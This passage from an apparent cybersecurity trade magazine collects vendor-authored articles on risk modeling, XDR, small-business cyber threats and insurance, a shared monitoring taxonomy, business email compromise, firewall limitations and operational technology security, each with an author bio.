analyze data that provides meaning. Comprehensive operational data, information on strategic objectives

and risk tolerances, and real-time monitoring results of cyber risks enables enterprises to quantify,

benchmark, and predict the magnitude and financial implications of threats and vulnerabilities.

In this scenario, a new, powerful methodology — Integrated, Digital Risk Modeling or IDRM — serves as

the universal translator. It enables enterprises to collect and analyze mass amounts of underlying data,

translates it into business intelligence, and presents it in an intuitive visual format – specific to that

stakeholder within the organization. This gives all stakeholders a common narrative, contextual

understanding, and the ability to drill into the information they need to achieve their goals, as well as the

ability to communicate more effectively with each other.

This approach is based on the foundations of IDRM and include the following:

• Inside-Out Modeling: Enterprises use their unique operational data to continuously monitor risk

exposure. This generates instantly actionable organization-specific insights that can’t be achieved

by the more common practice of relying on general industry information.

• Financial Impact Quantification: Companies calculate the annual loss expectancy of specific

risks in order to understand real-time financial exposure. With this intel they can see threats and

vulnerabilities in a financial context, weigh and compare their potential impact, and inform priority

setting and resource investment and allocation.

• Targeted Industry Benchmarking: Enterprises compare their risk exposure to industry peers —

after data is adjusted to take account of industry type, company size, risk appetite, data assets,

and other factors.

• Multiple Use Cases by Design: The ability to automate any risk framework or enterprise use

case and integrate enterprise-wide risk modeling eliminates siloed reporting and enhances

executive and board level decision making. The design flexibility helps organizations respond

nimbly to the latest emerging threat or headache.

• Neuroscience-Based Dashboards: Present comprehensive, enterprise-wide reports in clear,

unbiased formats that lead to more consistent, confident decisions and risk mitigation at each

management level.

• Risk Scenario Planning: Artificial intelligence (AI) and machine learning (ML) deliver a reliable,

predictive process that enables enterprises to assess best- and worst-case scenarios, compare

threats, and determine where to invest in risk mitigation. The platform continues to learn as it’s

exposed to more enterprise data, which finetune outputs and insights.

• Rapid, Customized Deployment: IDRM can customize the data captured across use cases to

deliver a comprehensive, bespoke view of each organization’s unique risk landscape — and the

platform can be operational within two to three weeks to generate fast ROI.

The AI /ML-driven IDRM methodology gives organizations a complete, actionable view of the risks they

face — and gives the C-suite, the CISO, and the information security operations teams the ability to

communicate effectively, in real time to make critical risk-based decisions.

About the Author

AJ is the CEO of OptimEyes.ai, an AI-powered SaaS solution for

enterprise security, compliance, and privacy risk management. Unlike

others, OptimEyes monitors risk real-time, on a continuous basis and

provide a trackable risk score, providing a single integrated dashboard

to easily understand total risk.

AJ is also an Official member of the Forbes Technology Council, and

the Founder and Chairman of ICCG, a 501c (6) non-profit, established

to improve local competitiveness in a global economy.

AJ is a serial Entrepreneur who successfully founded and sold a BPM

(Business Process Management) software company, and also

successfully established an IT consulting company. AJ has his MS in Computer Science from the

University of Pune, India, and resides in San Diego, CA. Our company website https://optimeyes.ai

Cybersecurity may seem an unending challenge, with new vulnerabilities, attacks and breaches

announced almost daily. With all the loud headlines, and the potentially large financial and professional

impacts of a breach or other attack, it’s easy for CISOs to feel a bit beleaguered.

Ransomware, for example, doubled in 2021 according to Verizon’s 2021 Data Breach Investigations

Report. Most industries have come under attack, including education, retail, government, manufacturing,

energy, healthcare, and financial services, among others. A notable development in 2021 was the rise of

supply-chain attacks like the Kaseya incident, which impacted at least 1,500 customers.

Data breaches, while often a component of a ransomware attack, also occur separately. Like

ransomware, breaches have increased markedly in recent years. According to the Identity Theft

Resource Center, in the U.S. alone, data breaches through September 30 were up by 27% over the same

period in 2020.

Feeling Beleaguered? 3 Practical Steps

for Cybersecurity Mastery

By Tim Liu, Co-Founder & CTO, Hillstone Networks

Further adding to the challenges of cybersecurity, the pandemic-driven proliferation of remote workers

has dramatically expanded the potential attack surface, as has the increasing adoption of clouds,

containers, virtual machines, and other distributed resources. Compounding these challenges are

increasing compliance requirements, a growing number of regulatory policies, and the sheer volume of

technologies on the market that can address at least some portion of these challenges.

While the challenges of cybersecurity are many and diverse, a few key strategies or principles can cut

through the clutter and bring a greater degree of order and control for cybersecurity professionals. At a

high level, think of it is see – understand – act.

Lack of visibility, or the ability to ‘see’ granularly across assets connected to the network, can be one of

the biggest constraints on a successful security posture. To be effective, security needs visibility into all

assets, including networks, servers and services, applications, users – and north-south as well as east-

west traffic, including traffic between network components like clouds, VMs and containers.

A number of security solutions seek to fill the visibility gap, like the Secure Access Service Edge (SASE)

that merges SD-WAN with other security capabilities to offer greater visibility into scattered assets and

services. Yet another solution, Micro-segmentation, is designed to mitigate threats and vulnerabilities in

east-west traffic between VMs and containers.

However, note that these technologies are most likely isolated from each other, or siloed. A newer

solution called eXtended Detection and Response, or XDR, leverages other security technologies (like

SASE, NGFW, WAF, and micro-segmentation) to aggregate data and deliver deep visibility into traffic

into, out of and within the network and its assets.

The second part of the strategy, ‘understand,’ means gaining insights from traffic and other data that

allows accurate analysis and characterization of potential attacks, threats and anomalies. For example,

multi-stage, multi-layer attacks have evolved to camouflage themselves as normal traffic to elude security

tactics, but usually leave subtle traces that can lead to their discovery and mitigation. By aggregating and

analyzing data across the entire network and assets, these threats can be detected much faster and with

far greater accuracy.

This step of the strategy also addresses a challenge faced by many security teams. As point security

products have multiplied in typical networks, the number of alerts and alarms has risen dramatically,

leading to a syndrome dubbed “alert fatigue.” Security teams often struggle to keep up and discern

legitimate threats from false positives.

Over the years, a number of products have been developed to address these dual concerns, however

many of them are cumbersome and costly. Here, too, XDR offers a number of benefits in threat correlation

analysis. Using AI and ML-enhanced methods as well as cloud-based threat intelligence, XDR evaluates

the aggregated data it gathers from other network-connected devices and identifies potential threats with

a great degree of accuracy – including disguised attacks that might otherwise be missed.

With granular visibility and thorough analysis in place, the final step of the strategy can be enabled. ‘Act’

refers to the ability to automate security responses to well-defined threats, relieving security staff of many

manual interventions. An XDR solution, for example, can orchestrate security ‘playbooks’ across multiple

security products, like NGFWs, WAFs and others, to provide a comprehensive response to threats.

Playbooks, or templates, optimize workflows for security incidents, and XDR solutions typically include

multiple predefined playbooks and allow custom playbooks to be defined by security teams as needed.

The XDR solution continues its operations of see, understand and act in an infinite loop, allowing rapid

incident triage and containment for improved cybersecurity.

This high-level strategy gives CISOs and other security team members the visibility, swift incident

detection, and far-reaching response that’s needed to secure network assets from endpoint to cloud.

Recognized in the Gartner Magic Quadrant for network firewalls for 8 consecutive years, Hillstone

Networks was recently named to the ‘visionaries’ quadrant. Founded in 2006, the company’s

infrastructure protection solutions provide enterprises and service providers with the visibility and

intelligence to comprehensively see, thoroughly understand, and rapidly act against multidimensional

threats and attacks. Trusted by global companies, Hillstone protects from the edge to the cloud with

improved total-cost-of-ownership.

About the Author

Timothy Liu is Co-Founder and Chief Technology Officer of

Hillstone Networks. In his role, Mr. Liu is responsible for the

company’s product strategy and technology direction, as well

as global marketing and sales. Mr. Liu is a veteran of the

technology and security industry with over 25 years of

experience. Prior to founding Hillstone, he managed the

development of VPN subsystems for ScreenOS at NetScreen

Technologies, and Juniper Networks following its NetScreen

acquisition. Mr. Liu is also a co-architect of the patented

Juniper Universal Access Control and holds an additional

patent on Risk Scoring and Risk-Based Access Control for

NGFW. In his career, Mr. Liu has served in key R&D positions

at Intel, Silvan Networks, Enfashion and Convex Computer.

He Liu holds a Bachelor of Science from the University of Science and Technology of China and a Ph.D.

from the University of Texas at Austin.

Tim can be reached online at @thetimliu and at our company website https://www.hillstonenet.com/

The Most Common Types of Cyberattacks Plaguing SMBs

An How to Protect Against Them

By Richard Clarke, Chief Insurance Officer, Colonial Surety

The media landscape is dominated by headlines like this “Hackers Target Cryptocurrency Companies in

HubSpot Data Breach” and this “Microsoft confirms it was breached by hacker group.” Leading most to

believe that cyberattacks and data breaches only afflict larger companies. However, the truth is, small

and midsized businesses (SMBs) are likely more vulnerable as they generally have less protection, and

more limited budgets to address management of the risk.

Most SMB owners don’t know they are just as susceptible to a cyberattack as their larger counterparts.

But, in fact, a recent report from IBM revealed that SMBs spend about $3M per breach, underscoring just

how important it is for SMBs to take cybersecurity and cyber protection seriously.

In order to understand the actions SMBs should take to best protect themselves, it’s important to first

identify the types of cyberattacks they are most likely to face. With that, let’s quickly review three of the

more common, ongoing types of cyberattacks facing SMBs.

1. Cyberextortion and Ransom Demands. Cyber extortion and Ransom Demands are one of the

most common cyberattacks for SMBs. These scenarios involve an attack or threat coupled with

a demand for money, or some other response, in return for stopping or remediating an attack.

SMBs are particularly vulnerable to these types of attacks because they do not have the

protections that larger organizations do, nor do they have the budgets to ramp up their spending

in those areas.

2. Privacy-Related Violations. Privacy-Related Violations involve a cyberattack or data breach

that result in a hacker or cybercriminal gaining unauthorized access to a database or network

and stealing private information. Any business that warehouses, handles, or transfers personal

or corporate information, has a potential exposure to this type of cyberattack.

3. Social Engineering Fraud. Social Engineering Fraud, which can also be known as

Impersonation Fraud, is a particularly tricky threat for any sized business. Unlike other common

types of cyberattacks that exploit security vulnerability, social engineering fraud targets

employees by fraudulently impersonating a third party in an effort to deceive an employee to

release funds or property, generally via wire transfer – this is often done through email phishing.

The aftershock

If you think the attack itself is where the problem begins and ends, you would be wrong. Following an

attack there are aftershocks that can ripple for decades if a company is not properly prepared.

For instance, Intrusion-Related Restoration Costs. This occurs when an SMB has experienced an attack

that includes unauthorized access to their networks. As a result, businesses are tasked with paying steep

costs in order to restore their networks to proper operating function. Not only can this process be

expensive, but it can be time-consuming as well.

Another example are Notification-Related Expenses. When personally identifiable information is involved

in a data security breach, notification laws, which vary state-to-state, require that the affected individuals

be formally notified in order to take proper precautions to protect their information. The cost of providing

the notifications as mandated by individual statutory laws is an unbudgeted expense for SMBs and can

be quite costly.

Setting up the appropriate guardrails

There are actions SMBs can take to both minimize the risk of these types of cyberattacks, as well as to

prepare for them if they do occur.

First, check, and re-check, cyber-vulnerabilities on an on-going basis. This can be achieved internally,

though some businesses choose to employ the use of ‘friendly hackers’ to help determine their biggest

vulnerabilities.

Second, make use of multi-factor authentication (MFA) to protect against phishing, social engineering

and password brute-force attacks. This can also help prevent logins from attackers exploiting weak or

stolen credentials.

Third, train employees to contact companies directly when receiving unsolicited messages asking about

business related information, never provide personal or business information to someone they are not

certain is authorized, never enter sensitive information into a webpage before checking the security

settings and make use of existent security measures like email filters, antivirus software, and firewalls.

Additionally, each employee should be sure to keep all of their software updated.

To supplement the management of risk efforts by the organization, strong consideration should be given

to cyber insurance. Cyber insurance is a safety net offering organizations both legal and technical support

to move forward with a response plan – ensuring customers and employees remain digitally safe once

an attack occurs. SMBs are sought by many insurers - some insurers focus on writing larger risks, or

some of the exposure, and some insurers prefer SMB-sized risks. A variety of insurance coverage is

available, and although cyber insurance pricing has been increasing over the past few years, coverage

is generally available.

Essentially every business that deals with sensitive information and data is vulnerable to cyberattacks –

regardless of size. With cybercriminals rapidly becoming more sophisticated in their tactics, putting

forward a holistic cybersecurity plan combining these measures is the best way for SMBs to prepare

themselves for an increasingly likely cyberattack.

About the Author

Richard Clarke, Chief Insurance Officer, Colonial Surety . As an

insurance industry veteran with more than three decades of experience,

Richard is a Chartered Property Casualty Underwriter (CPCU), Certified

Insurance Counselor (CIC) and Registered Professional Liability

Underwriter (RPLU). He leads insurance strategy and operations for the

expansion of Colonial Surety’s SMB-focused product suite, building out

the online platform into a one-stop-shop for America’s SMBs.

Richard can be reached at https://www.colonialsurety.com

Companies have been assessing their risks for ages so that they can mitigate them. When companies

began to outsource, they faced new risk challenges because they didn’t have much visibility into the

control adequacy of the third parties they used. Technology, digital transformation, networking

connectivity, and the Internet have grown into a commercial space over the past 25 years, and companies

— and their third parties — now face a complex ecosystem of cybersecurity issues. As a cybersecurity

risk professional, you know them all.

Except maybe for the new ones somebody is concocting right now.

Why A “Group of Rivals” Developed A

Cybersecurity Taxonomy, And What It

Buys You

Advancing Risk Management and Stemming the River of Risk by Adopting the Consistent Taxonomy

of Cybersecurity Threats – Cybersecurity’s “Lingua Franca.”

By Charlie Miller, Senior Advisor, Shared Assessments, CTPRP, Distinguished

Ponemon Fellow

It’s one thing to monitor the cyber control activity — and threats — for one organization. Outsourcing

drives cyber security monitoring to a new level, because suddenly it’s not just your own organization

you’re worried about. You have to be aware of the most critical threats for your third-party suppliers and

service providers as well because compromises there may affect you. A large company might have

40,000 suppliers, or more. Monitoring all of that is a tall order.

Enter Continuous Monitoring

Some third parties are directly connected to corporate networks, and some are not, but all have increased

cyber security exposures. Security Rating Services (SRS) have arisen recently. Their solutions, usually

provided as Software-as-a-Service (SAAS), continually watch over their own organization’s cyber

hygiene as well as a host of third parties and potential third parties — examining events and vulnerabilities

for which they provide a rating. The offerings and ratings of SRS providers are similar, but they vary in

terminology, price and pricing models, the events they monitor, their alignment with external security

frameworks and standards, in customer interface, data sources, methods for gathering and reporting

cybersecurity control weaknesses information, and in many other ways. Basically, they’re all different.

That diversity gives you a rich variety of choices but makes it difficult to compare services and ensure

that cyber hygiene monitoring aligns with your control requirements.

There is another and perhaps more subtle aspect to all this difference between organizations and the

providers they use. Every IT and cyber security manager must communicate upwards in the organization,

eventually all the way to the board of directors. Clarity in that communication affects funding, staffing,

and equipment as well as security per se.

What was needed was a lingua franca — a common language that describes the world of monitored

cyber threats. This would allow organizations to:

• Achieve a better understanding of how events monitored by SRS align with the

outsourcer’s control requirements, and vice versa.

• Compare the services offered by several SRS providers.

• More easily communicate any issues identified by the SRS and develop mitigation

approaches to correct them.

• Clearly communicate across the third-party risk management ecosystem, which helps

boards and leadership teams evaluate cyber threats to the business and align

appropriate resources. It is important to have a common terminology, especially when

communicating to non-technical people. In an environment with global supply chains,

this clear communication becomes even more important.

The lack of such a lingua franca — a consistent taxonomy of cybersecurity threats — has posed problems

for organizations, third parties, and SRS providers.

So, What’s the Problem?

Table 1 and Table 2 show an example of a common yet specific terminology problem. A company wants

to assess a vendor to ensure that the vendor’s email servers cannot be used for phishing attacks targeting

the outsourcing company. Specifically, the outsourcer wants to know if the vendor has enabled the

Sender Policy Framework (SPF) on their network. SPF is a Domain Name Service (DNS) configuration

that organizations can enable to help stop attackers from impersonating an organization’s email

addresses.

When reviewing Security Rating Service A’s alert category, it is easy to spot the reference to SPF

because SPF is specifically listed. However, in Security Rating Service B’s solution, it is hard to tell if

either Category 1 or Category 2 matches the outsourcers need for SPF monitoring.

A Group of Rivals

Shared Assessments is a member-driven organization that has developed and promoted standardized

resources for corporate risk assessment (not just cyber risk assessment) for over a decade. SA members

— including SRS providers such as 23Advistory, BitSight, Black Kite, Panorays, RiskRecon, and Security

Scorecard — worked through Shared Assessments to create the common taxonomy with which they

could describe their varied offerings. The taxonomy establishes consistent language, practices, and

reporting structures for complex cyber events and vulnerabilities, and removes the potential for

ambiguities. Each of the “rivals” sees advantages for themselves and their clients.

The World Economic Forum and NIST are both considering leveraging the taxonomy to ensure

consistency with their own frameworks and terminology.

The taxonomy itself takes no stance on the relative importance of any one event over any other. What is

required is that an event is currently being monitored by someone, in some way, in the real world. The

events are described in the adverse to avoid duplication. For example, one SRS provider may say “the

XYZ patch is missing — that’s bad” and provide a lower score while another provider may say “the XYZ

patch is present — that’s good” and provide a higher score. The taxonomy always describes the XYZ

patch in its adverse form to avoid describing the condition twice.

Among the key definitions in The Unified Third Party Continuous Monitoring Cybersecurity Taxonomy are

the following:

• Monitoring Surface: Cataloging of technical or organizational characteristics that help

identify the presence of other events or states, such as domain names, Internet Service

Providers, email service providers, and IP addresses to help stakeholders better

understand how SRS providers identify events. This category of definitions includes

those for fingerprint values and attach surface variables such as those associated with

assets that can be used to understand the scope, strengths, and weaknesses of an

organization’s business and technical environment. Surface variables can determine

whether a control or vulnerability does or does not exist.

• Events: Actual cybersecurity vulnerabilities indicating a lack of a control that a

monitored organization may be exposed to. Domains and categories include:

o Business Intelligence: The range of categories such as reputational exposure,

business metric changes, security incidents, and other events.

o Indicators of Compromise: Including active and passive signals. Active, such as

dangerous activity that is occurring and picked up in real-time or near-real-time;

passive, such as lists, credential leaks, and exposed information.

• Vulnerabilities: Defining the full constellation of areas of potential risk across the

spectrum of cyber elements such as DNS, email, web applications, remote access,

practices, network services, client applications, network, and cloud security.

A “River of Risk”

One of the biggest problems seen by Shared Assessments’ “group of rivals” is slow patching cadence.

With 40–50 billion (with a B) vulnerabilities cropping up per week, slow patching continues to be a major

problem. In descending order are other issues such as Distributed Denial of Service (DDoS) attack

mitigation, End-of-Life systems remaining online, and systems online after End-of-Support.

According to the CSC 2021 Domain Security Report on Forbes Global 2000 companies:

• 81% did not use Registrar-Lock Protocol

• 50% did not use DMARC (Domain-based Message Authentication, Reporting &

Conformance)

• 89% did not use DKIM (DomainKeys Identified Mail, an email authentication method to

detect forged sender addresses)

• 60% of “homoglyph” domains (to catch typos like “amuzon”) were registered in the last

two years.

According to the rivals, simple and effective mitigations include:

• TLSv1.3 adoption

• HTTP Strict-Transport-Security response header (HSTS headers)

• OWASP Top 10 (updated September 2021)

• Center for Internet Security (CIS) Critical Security Controls (v8 updated May 2021)

The taxonomy is an industry effort and a living document, maintained by Shared Assessments. It is the

most recent result of a two-phase cooperative project let by the Shared Assessments Continuous

Monitoring Working Group, established in 2017, which galvanized practitioners from over 55 member

organizations. The first phase was published as an article in 2019, “Creating a Unified Continuous

Monitoring Cybersecurity Taxonomy: Gaining Ground by Saying What’s What.” The second phase is the

taxonomy itself.

A copy of the Shared Assessment Unified Third Party Continuous Monitoring Taxonomy can be obtained

for free and here is where the SRS firms explain the benefits of the Webinar Cybersecurity Taxonomy for

Continuous Monitoring.

About the Author

Charlie Miller, Senior Advisor, Shared Assessments, CTPRP,

Distinguished Ponemon Fellow - Charlie is a frequent speaker and a

recognized expert in Third-Party Risk. His key responsibilities include

expanding the Shared Assessments Third-Party Risk Management

membership-driven program, facilitating thought leadership, industry

vertical strategy groups, continuous monitoring / operational

technology working groups, and IoT research studies.

He joined Shared Assessments in 2015 and has been in the third-party

risk space for over 15 years. He has vast industry experience, having

set up and led third-party risk management and financial services

initiatives for several global companies.

Charlie was the Director of Vendor and Business Partner Risk Management at AIG and implemented

third-party risk management programs at Bank of Tokyo Mitsubishi (BTMU). He held multiple leadership

roles at Merrill Lynch & Co., Inc. overseeing the company’s global vendor management program and a

Director of Technology Audit. He led a financial services practice unit as a consulting partner at Deloitte,

focusing on technology outsourcing, risk management, and cost control. He began his career at IBM as

a systems engineer.

Charlie is a Distinguished Fellow of the Ponemon Institute, a Certified International Privacy Professional,

and Certified Third-Party Risk Professional.

Connect with Charlie via email or through LinkedIn, and at https://sharedassessments.org/

What is Business Email Compromise?

A Guide to CEO Fraud

By Shanna Utgard, Senior Cyber Advocate, Defendify

"URGENT - Are you available? I need you to take care of a pending invoice from one of our contractors.

I'm in a meeting and can't talk, but we have to handle it ASAP."

You may have received a message like this or know someone who has. This is an example of a specific

type of spear-phishing attack known as Business Email Compromise (BEC) that targets individuals with

access to sensitive or financial data.

Cyber attackers use evolved social engineering techniques to take advantage of human interactions to

manipulate employees into breaking standard security procedures or ignoring best practices. Even with

traditional cybersecurity measures in place, these cybercriminals can gain unauthorized access to an

organization's systems, networks, and information through its employees, often without their knowledge.

How Cyber Criminals Leverage Research and Social Engineering

The FBI defines BEC as a "sophisticated scam targeting businesses working with foreign suppliers

and/or businesses that regularly perform wire transfer payments. The above is an example of a CEO

impersonation scam, a growing type of BEC attack that attempts to trick employees into thinking a high

official at their company needs them to send money – and fast.

Also called CEO fraud, this tactic relies on a sense of urgency and authority while playing off employees'

desire to be helpful and do a good job. According to the FBI Internet Crime Complaint Center's (IC3) 2021

Internet Crime Report, BEC schemes were the costliest type of attack, with an adjusted loss of

approximately $2.4 billion last year.

Before conducting these BEC schemes, the threat actors do their homework. They peruse the company

website, social media pages, media coverage, and other publicly available data sources to collect

information on their target organization. This research may include details about executive and high-level

employees, new hiring announcements, travel plans or similar out-of-office notifications, company news,

and other notable projects or events. In the CEO fraud example, they will identify key targets and spoof

a trusted persona to ensure the best chance of success. These scams have even evolved to include

SMS text messages, personal emails or social media accounts, and personal devices, such as cell

phones.

Cybercriminals use the information collected to target employees and persuade them to divulge

confidential information or sensitive data that bad actors may use for fraudulent purposes.

BEC's common goals include convincing employees to click on a link and provide log-in credentials, send

sensitive data, perform a financial transaction (wiring money, purchasing gift cards), or open malicious

attachments.

Other types of Business Email Compromise:

CEO Impersonation: as mentioned above, this tactic involves spoofing a message from an executive,

requesting employees perform some action, such as sending a wire or other financial transaction,

providing employee W-2s, purchasing gift cards, etc.

Fake Invoice Scams: attackers spoof an email with an invoice from a vendor or 3rd party that an

organization regularly works with, but with updated payment information

Data Theft: HR Personnel are targeted to obtain sensitive data such as employee or company tax

information, or attackers pose as employees and send new payroll direct deposit instructions

Account Compromise: Email accounts are compromised and are used to send out invoices or requests

for payment to attacker-controlled accounts.

If an employee falls for these tactics, it could result in damage far beyond personal embarrassment.

Providing passwords to bad actors, sending funds or sensitive data to an attacker, and ransomware

delivered through the click of a link can all have wide-reaching effects on the entire organization.

Implementing Comprehensive Cybersecurity

We often come back to the pillars of comprehensive cybersecurity: leveraging people, processes, and

technology to defend against current and future threats. Applying an adaptable approach to CEO fraud

and other BEC scams can go a long way in protecting organizations from evolving tactics, especially with

the new challenges of working in a hybrid or remote world.

Employees are often the first and last line of defense against cyberattacks like BEC. They should receive

proper training and guidance to recognize and respond to potential threats. Conducting cybersecurity

training on an annual (or even quarterly) basis is no longer enough, as threat actors change tactics

frequently and awareness dwindles over time. New employees are prime targets for BEC attacks, so it is

advantageous to begin their cyber education during their initial onboarding and orientation. Organizations

should conduct frequent, engaging training and encourage employees to be on high alert for any scams

they might encounter. With the recent move to a hybrid or remote workforce, many organizations

implement collaborative cloud-based tools to stay connected. It is now more important than ever to

communicate clear policies for these urgent requests, particularly for new employees who may have

never met their colleagues in person.

You may decide to require multiple signatures or approvals, direct face-to-face or telephone verification,

or another established process.

Provide a clear and easy way for employees to report suspicious activity or that they have fallen victim

to social engineering attacks, including CEO fraud. An incident response plan for BEC is crucial to

mitigate the possible repercussions of such an attack. The faster fraud is reported, the higher the chance

any funds or data might be recoverable.

Finally, implementing basic cybersecurity measures can go a long way in preventing widespread impact

in the event of a BEC attack. Provide tools for employees to easily create and use unique passwords and

enable multi-factor authentication to make it more difficult for cybercriminals to take over email and other

valuable accounts.

Through regular, engaging awareness training, simple and clear policies, and secure technology, every

employee, from the (real) CEO to the intern, can significantly keep their organization safe.

About the Author

Shanna Utgard is the Senior Cybersecurity Advocate at Defendify,

the all-in-one cybersecurity platform that makes cybersecurity

possible for ALL businesses. Shanna is an award winning channel

manager and a frequent speaker on how organizations can

develop a comprehensive program that is simple, affordable, and

works around-the-clock on multiple levels. Email her at

sutgard@defendify.com or get in touch with the team at

Defendify.com.

The Cybersecurity and Infrastructure Security Agency (CISA) recently added 66 vulnerabilities to its list

of known exploited security holes, including a WatchGuard firewall vulnerability exploited in attacks linked

to a Russian state-sponsored threat actor. CISA’s call to patch this vulnerability follows on the heels of

last year’s Colonial Pipeline attack, as well as other cybersecurity incidents where firewalls were

breached. Whether the threat came in through the front door or not, every successful cyberattack has

breached a firewall at some point.

There’s no denying that cybercriminals are growing increasingly sophisticated – just look at the headlines

from recent years. Unfortunately, despite industry innovation and government guidance, what

organizations are doing to protect themselves has largely remained the same. We’re seeing it more and

more: Firewalls are becoming antiquated when compared to the sophisticated technologies used by

cybercriminals. It’s high time for organizations to acknowledge the firewall gaps and take steps to build

more robust cybersecurity defenses.

Firewalls Aren’t Enough to Protect Against

Evolving Cyber Threats

By Pat McGarry, CTO, ThreatBlockr

While firewalls can detect attacks within an organization’s network, they don’t work when the attacker is

already inside. Advanced firewall solutions may be able to identify unusual behavior, but they can’t

prevent the exfiltration of account data from within the authorized account. Firewalls only use a limited

amount of cyber intelligence and have limited ability to handle additional cyber intelligence sources,

allowing threats to sneak past. Not to mention, managing the small amount of threat intelligence you can

add to a firewall is slow due to its manual nature. This “firewall gap” problem creates challenges for

organizations when it comes to updating their cybersecurity defenses and securing their networks.

● Gap #1: Firewalls detect and block threats using their own proprietary threat intelligence, which

represents a narrow view of the threat landscape. When defending against threats is a volume

game that requires huge amounts of cyber intelligence from multiple sources, no single source of

threat intelligence or existing security control can cover the entirety of the threat landscape alone.

For effective threat detection, organizations need threat intelligence from multiple sources.

● Gap #2: Firewalls have limited ability to add threat intelligence, and while adding additional threat

feeds in an attempt to close this firewall gap is great in theory, it is significantly more challenging

in practice. Firewalls also have limited ways you can integrate data into them. Firewalls were not

designed to work with large volumes of third-party threat feeds, and they do a variety of different

things today (many that they weren’t originally designed to do), all of which require significant

resources.

● Gap #3: Lastly, for most organizations, the process of managing threat intelligence in firewalls is

manual and involves updating external blocklists directly on the firewall. Even with automated

blocklist capabilities, many organizations must also account for firewall changes to go through a

change management process driven by compliance requirements, which adds additional time to

updating blocklists.

The threat intelligence volume of limits of firewalls combined with the dynamic nature of threat intelligence

amplify these problems. Threats are rapidly changing and so is threat intelligence, the dynamic nature of

which makes it nearly impossible and impractical to manage manually. Multi-source cyberintelligence

should include commercial threat intelligence providers, open source intelligence (OSINT), government

cyber intelligence, and industry threat intelligence to assist organizations in effectively detecting and

blocking threats. With this wide array of cyber intelligence available combined with the fact that

organizations also generate their own valuable intelligence, it’s critical to have the flexibility to add more

sources of intelligence and an integration process that doesn’t delay an organization’s ability to rapidly

respond to threats.

The Colonial Pipeline, JBS, Volkswagen, and ParkMobile incidents all have one thing in common: They

all had firewalls protecting their networks but they were still breached. While firewalls continue to provide

an important layer of network protection, they can’t protect a network on their own. With gaps like the

limited view of threat intelligence that firewalls use to detect and block threats combined with a limited

ability to significantly increase the intelligence of your firewall, your network is only partially protected

from today’s cyber threats.

As cybercriminals become increasingly sophisticated and their attack vectors evolve, we must too.

Organizations can no longer protect against real-time data threats with an approach based on reactive

legacy solutions. To keep pace with the cyber threats of today and tomorrow, organizations need real-

time threat intelligence from multiple sources and automated protection to defend their network in every

moment.

About the Author

Pat McGarry has more than 25 years of hands-on experience

in all aspects of hardware and software development, to

include iterative requirements analysis, architecture,

engineering, test, managerial, and leadership roles. His skills

have been brought to bear across a wide variety of technology-

related disciplines including embedded systems design,

network systems analysis and design, advanced network

testing, cybersecurity, deployable machine learning and

artificial intelligence, internet of things, big data, advanced data

analytics, and high-performance heterogeneous computing.

He has been granted three US patents and has spoken at a

variety of user and industry conferences. He received

bachelor’s degrees in Computer Science (BSCS, ’93) and

Electrical Engineering (BSEE, ’94) along with a minor in Mathematics, all from Virginia Tech.

Pat can be found on LinkedIn and on the ThreatBlockr website at ThreatBlockr.com.

The Top Five Reasons You Should Take Operational

Technology Cybersecurity Seriously

How to Protect Critical Infrastructure During This Unprecedented Time

By Matthew Morris, Global Managing Director, 1898 & Co.

The newest trends in political warfare include cyberattacks on infrastructure security with hackers looking

to generate massive setbacks in 2022 and beyond. With conflict escalating overseas, there’s been much

conversation about what precautions should be taken to protect U.S. businesses from losing everything

in an attack perpetrated by bad actors looking to exact chaos, sabotage, extort money, or all of the above.

What’s the answer to such a daunting problem? It's simple: the proactive inclusion of operational

technology security measures for every critical infrastructure related business - refineries, utilities, plants,

pipelines, and municipalities. Here are the top five reasons you should take OT cybersecurity seriously.

1. New Trends in Political Warfare

Advanced cyber weaponry has redefined the current political landscape, making it easier for

cybercriminals operating within countries like Russia, to cripple entire organizations from overseas. The

Russia-Ukraine crisis is already impacting the daily lives of Americans in various ways, including the

spiking of gas prices.

But it could get so much worse. Hackers are no longer focused on size or scope, and every organization

is at risk. Cyber related sabotage may or may not be reserved for individual businesses. Instead, poorly

designed and executed malware or ransomware could affect all aspects of the U.S. including all aspect

of our critical infrastructure, e.g. banks, power plants, water treatment facilities and communications. We

are entering an entirely new era of war, where weapons leave the physical domain and enter the digital,

unseen, and behind-the-scenes attacks that will go unnoticed without the proper protections.

2. The Cybersecurity Labor Shortage is Real

The global cybersecurity talent shortage reached an estimated 3.5 million workers in 2021. Industry

experts warned of this dynamic for the past several years; however, the demand for skilled workers

continues to outstrip supply. Coupled with a growing threat landscape, asset owners are at risk.

For OT environments, the talent shortage is further impacted by managed services providers that have

focused on the IT side of the house. They offer IT cybersecurity services, but they lack an understanding

of and the right capabilities for protecting OT. Firms often don’t understand OT environments, how they

work, and how to restore them after an attack. They have limited knowledge of industrial control systems

and other similar technologies. Many of these managed services vendors also “don’t know what they

don’t know,” and tell companies they can help them with IT and OT, despite their knowledge gaps.

These firms need to stop stating they have these capabilities. People will realize it’s a serious industry

problem that requires OT specialization and expertise. However, in the current environment, OT

cybersecurity experts are hard to find, can be prohibitively expensive, and are difficult to retain. With OT-

focused managed security services, critical infrastructure companies can manage their risk better while

remaining focused on their core missions.

3. Security Loopholes Are Common

Inherent software vulnerabilities allow for more data flow and connections, which correlates to attacks.

This makes the stakes for identifying OT security headaches and diminishing risks extraordinarily high.

OT security isn’t just an internal concern, relegated to the halls of individual organizations. It’s a national

consideration. In April 2021, the White House unveiled a 100-day cybersecurity effort to protect the

nation’s power grid amidst increasing concerns regarding the state of the nation’s cybersecurity

vulnerabilities. The effort was followed by an attack on a major oil resource, the Colonial Pipeline, further

emphasizing the need for increased provisions. Repercussions of the hack were widespread, as The

Colonial Pipeline is one of the largest oil suppliers in the country. The attack forced the corporation to

shut down operations, generating supply shortages and higher fuel prices.

4. Limit Long Term Damage with OT

An OT incident could do more than cause an immediate headache and require damage control. The

effects could last long-term. An ounce of prevention today will protect against the catastrophic possibilities

of being hacked tomorrow.

OT systems are comprised of highly complex technologies, making it even easier for complications to

occur and go unnoticed. These attacks could cost organizations millions – even billions – in loss and

recovery. Cybersecurity Ventures predicted that cybercrime would cost companies $6 trillion in 2021 and

cybercrime costs are expected to grow 15 percent per year reaching $10.5 trillion by 2025. The financial

incentive to protect cyber assets is a large one, not to mention the impact an attack could have on the

surrounding communities, company employees, and overall revenue.

5. Threats to Human Life Set OT In a Class of Its Own

Approximately 9.2 trillion gallons of water cover 247 square miles leading to the iconic Hoover Dam,

enough water to fill the Great Salt Lake in Salt Lake City, Utah – twice. Now, imagine the entirety of the

